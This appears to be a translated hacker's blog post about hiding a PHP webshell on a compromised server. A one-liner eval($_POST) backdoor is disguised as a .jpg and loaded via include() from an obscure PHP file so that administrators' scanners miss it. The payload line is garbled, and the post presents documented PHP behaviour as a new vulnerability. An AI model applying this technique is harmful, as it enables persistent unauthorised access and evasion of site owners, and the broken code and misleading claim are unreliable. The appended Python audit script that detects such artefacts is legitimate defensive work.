Two days ago, parsing vulnerabilities in both nginx and IIS7 were exposed and several shells were lost, so I wanted to find a super hidden backdoor method. I accidentally discovered that the include function can parse any file and run it as PHP. I searched the Internet for include function vulnerabilities and found few results; most of them are about file inclusion vulnerabilities, for example where a variable is used as the included object. Those concern the program, not the include() function in PHP itself. I have not seen any article about using this function to parse arbitrary files as PHP, so for now I am calling this original. Contact me if you found it earlier. Haha, if no one has, then this vulnerability was discovered by me.
include("linuxso.jpg"); and so on: all of them are executed as PHP. Because it is a problem with the PHP function library, it has nothing to do with the web server or the system. In theory Apache, IIS, nginx or any other web server will do. I only tried Apache and nginx, and the test was successful. The test method is relatively simple and I will not talk about it here. What is the purpose of this vulnerability? Currently, I use it to create a super hidden web backdoor after obtaining a web shell. Other uses are up to you. The experiment begins.
The administrators feel that there is no hidden danger.
1. Create a new file linuxso.txt with the following content:
Eval($ _ POST [linuxso]);?>)?> // Its function is to create a linuxso.php file in the current directory and write the one-line statement into it
Rename it to linuxso.jpg.
2. Find an image directory and upload the jpg. Write down the path.
Find an almost unused PHP file in a deep directory, such as class.archive_read.php, and add the statement include(.../../xxx/linuxso.jpg); // work out the relative path.
3. Access linuxso.php
Connect with the one-liner and upload a Trojan. When you are done, remember to delete the pony. This way, no matter what tool he uses to scan for web Trojans, he cannot find ours. Haha, unless... the administrator has read this article.
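Seen from the administrator's side, the procedure above leaves two artifacts on disk: a PHP file whose include targets a non-PHP extension, and a static file in an upload directory that carries a PHP open tag. The following audit script is an added example, not part of the original post; the extension lists, regexes, finding labels and the sample file names (all constructed, with a harmless marker as content) are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Assumed extension sets; adjust them to the site being audited.
STATIC_EXT = {".jpg", ".jpeg", ".png", ".gif", ".txt"}
PHP_EXT = {".php", ".inc", ".phtml"}
# Full or echo open tag inside a file that should hold no PHP at all.
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.I)
# include/require with a literal string target, e.g. include("../x/a.jpg");
INCLUDE = re.compile(
    rb"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)

def scan(root):
    """Return sorted (finding, relative path, include target) tuples."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        ext = path.suffix.lower()
        rel = path.relative_to(root).as_posix()
        if ext in STATIC_EXT and PHP_TAG.search(data):
            findings.append(("php-in-static-file", rel, ""))
        elif ext in PHP_EXT:
            for m in INCLUDE.finditer(data):
                target = m.group(1).decode("utf-8", "replace")
                if Path(target).suffix.lower() not in PHP_EXT:
                    findings.append(("include-of-non-php", rel, target))
    return sorted(findings)

def demo():
    """Build a constructed web root with harmless markers and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp)
        for sub in ("lib", "img"):
            (web / sub).mkdir()
        (web / "lib" / "old.php").write_text(
            '<?php include("../img/photo.jpg"); ?>')
        (web / "lib" / "ok.php").write_text('<?php require_once "db.php"; ?>')
        (web / "img" / "photo.jpg").write_bytes(
            b"\xff\xd8\xff\xe0JFIF<?php echo 'marker'; ?>")
        (web / "img" / "clean.jpg").write_bytes(b"\xff\xd8\xff\xe0JFIF\x00\x01")
        return scan(web)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Hits are leads for manual review, not verdicts. Includes whose target is built from a variable, and files using PHP short open tags, fall outside these patterns.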